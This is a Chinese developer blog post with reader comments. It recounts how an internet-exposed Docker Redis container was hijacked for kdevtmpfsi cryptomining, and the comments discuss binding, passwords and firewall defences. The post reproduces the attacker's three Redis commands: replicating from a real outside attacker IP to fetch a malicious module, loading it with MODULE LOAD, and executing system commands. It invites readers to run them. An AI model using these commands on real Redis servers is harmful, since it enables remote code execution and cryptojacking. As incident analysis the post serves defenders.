Laravel
话题列表 社区 Wiki 优质外文 招聘求职 Laravel 实战教程 社区文档
登录
注册

docker Redis 被挖矿场景复现

lyxxxh 的个人博客 / 0 / 4 / 创建于 4年前 / 更新于 4年前

docker redis被任意链接 导致被kdevtmpfsi挖矿记录

昨天发现服务器被挖矿了,我ssh可是都没开的,他是怎么用我容器挖矿的?

带这个问题,我把redis容器再次弄成随意链接,想钓出他执行的命令。

开始追踪前准备

config set slowlog-log-slower-than 0   //所有命令都会被定义成慢查询 
config set slowlog-max-len 10000   //保留1w条记录
config set slowlog-max-len 1000000 //他会不会执行很多命令? 改成保留100w保险些

上钩了

大概3-4小时,就把我容器做矿机了,真快。

是不是有检测系统,发现我掉了…

这是redis执行过的所有命令(有部分是我的):
http://cdn.lblog.club/files/redis_log.txt

slowlog格式说明
7    slowlog的id
1585115869   执行的时间戳
15            执行命令的消耗时间 微秒
set            //命令
1            //命令
test        //命令    组合就是set 1 test
127.0.0.1:55968    //客户端 端口

我得到了他的执行过命令,然后我重新编译容器,准备复现他的操作。

开始复现

127.0.0.1:6379> slaveof 82.118.17.133 8887    
OK
//此时把他redis数据 同步到受害机  dump.rdb已经是有毒的模块了! 
//可惜dump.rdb用rdb看不了,不知道是什么操作,不知道这个dump.rdb的内容

127.0.0.1:6379> MODULE LOAD ./dump.rdb      //加载模块
OK

127.0.0.1:6379> system.d id
"" 
(1184.54s)
//获得成就:主动当矿机 成就加成:cpu+90% 内存+10% (使用量)

你在你的redis执行这三条命令, 就可以复现被成为矿机的场景。主动当矿机了

本作品采用《CC 协议》,转载必须注明作者和本文链接
专心学习不瞎搞
lyxxxh
1.3k 声望
专心瞎搞不学习
《L05 电商实战》
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
《L04 微信小程序从零到发布》
《L04 微信小程序从零到发布》
从小程序个人账户申请开始,带你一步步进行开发一个微信小程序,直到提交微信控制台上线发布。
讨论数量: 4
排序:
时间 投票
L学习不停
Laravel 8.x 译者 623 声望

那么问题来了,是不是不用宝塔就不会出这些问题呢。我是在阿里云主机上买的一个最小配置的,也和楼主一样docker里面的redis端口也映射到了宿主机,但是从来没发生过这样的问题。
是不是说明宝塔做的很不安全,我也从没用过宝塔,看过之前前端的同学使用的是宝塔,有点印象。

4年前 评论
lyxxxh
1.3k 声望

@L学习不停

跟宝塔没关系

你的redis容器监听的是0.0.0.0吗?如果是127.0.0.1,那么不可能了。

如果是0.0.0.0,你可以试试redis-cli -h 主机是否可以链接上去

4年前 评论
L学习不停
Laravel 8.x 译者 623 声望

file

默认监听的就是0.0.0.0,应该是你云主机默认开启了所有端口的。我的阿里云只开启了22和443,所以外网绝不可能访问到。宝塔是一层防护,但宝塔应该是有漏洞,你应该登录到你云主机的平台上去看看,是不是开启了所有端口。

4年前 评论
lyxxxh (楼主) 4年前

@L学习不停
你把安全组开放6379试试。

宝塔的安全 防火墙开放端口,其实就是给firewall开放端口。
也就是用工具来操作firewall

我是腾讯云的,
因为是个人服务器,我认为有firewall就够了。(每次开放端口很麻烦,要去配置安全组&& 宝塔开放端口,所以我把安全组全部打开了)

没想到,没有经过firewall

L学习不停 (作者) 4年前
@lyxxxh 嘿嘿,不用了,如果我打开了6379端口肯定就外部就能连上了。
mowangjuanzi
Laravel 9.x 译者 258 声望 / PHP工程师 @ null

其实还有一个问题就是Redis 必须设置密码。然后绑定端口。

这个好像是通过 redis 的 config 命令?我之前中招过。找了一下午才把问题给找出来。真他娘的隐蔽

4年前 评论
lyxxxh (楼主) 4年前

为什么要设置密码?
绑定端口? 是绑定127.0.0.1

只是不让别人登录的手段而已,

即使别人不放马,redis被别人随意登录,你也不允许吧。

L学习不停 4年前
如果是单机应用,就保留常用的80,22,443,这样安全系数就提高了。
mowangjuanzi (作者) 4年前
@lyxxxh 有允许远程登录的情况。不要一棍子打死

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
支持 MD 帮助
lyxxxh
未填写
文章
89
粉丝
108
喜欢
481
收藏
724
排名:108
访问:8.8 万
私信
所有博文
文章归档
1 篇 2024 年 9 月 1 篇 2024 年 8 月 1 篇 2024 年 3 月 1 篇 2023 年 8 月 1 篇 2023 年 7 月 1 篇 2023 年 4 月 2 篇 2022 年 9 月 4 篇 2022 年 8 月 3 篇 2022 年 7 月 2 篇 2022 年 6 月 3 篇 2022 年 4 月 1 篇 2022 年 2 月 1 篇 2022 年 1 月 1 篇 2021 年 8 月 1 篇 2021 年 6 月 3 篇 2021 年 5 月 2 篇 2021 年 3 月 1 篇 2021 年 2 月 3 篇 2020 年 11 月 3 篇 2020 年 10 月 2 篇 2020 年 9 月 5 篇 2020 年 7 月 6 篇 2020 年 6 月 7 篇 2020 年 5 月 7 篇 2020 年 4 月 7 篇 2020 年 3 月 2 篇 2019 年 9 月 3 篇 2019 年 8 月 3 篇 2019 年 7 月 3 篇 2019 年 6 月 2 篇 2019 年 5 月 3 篇 2019 年 4 月 3 篇 2018 年 11 月
最新文章 最受欢迎
5个月前 opencv获取手机屏幕内容 6个月前 Carbon::parse真是坑,直接用UTC。 11个月前 git只提交固定文件 1年前 简单丶靠谱的保证websocket客户端不断开 1年前 Laravel接口幂中间件
133 Laravel根据用户id生成四位数唯一邀请码 116 [手摸手带你创建php现代化框架] 教程终于写完了 33 一些代码写法推荐 29 记一次用户抢购商品导致服务器炸了 25 Hyperf 开发的动漫站记录
博客标签
php
4
 laravel
14
 database
4
 generator
2
 crud
3
 repository
1
 framework
1
 queue
1
 laravel-administrator
2
 pdo
1
 router
1
 homestead
1
 laravel扩展
2
 hyperf
1
 xian'tan
1
社区赞助商
成为赞助商

关于 LearnKu

LearnKu 是终身编程者的修道场
做最专业、严肃的技术论坛
LearnKu 诞生的故事

资源推荐

  • 《社区使用指南》
  • 《文档撰写指南》
  • 《LearnKu 社区规范》
  • 《提问的智慧》

    • 服务提供商

    其他信息

  • 成为版主
  • 所有测验
  • 联系站长(反馈建议)

    • 粤ICP备18099781号-6 | 粤公网安备 44030502004330号 | 违法和不良信息举报

    Summer 设计和编码

    请登录

    内容举报
    匿名举报,为防止滥用,仅管理员可见举报者。

    我要举报该,理由是:

    取消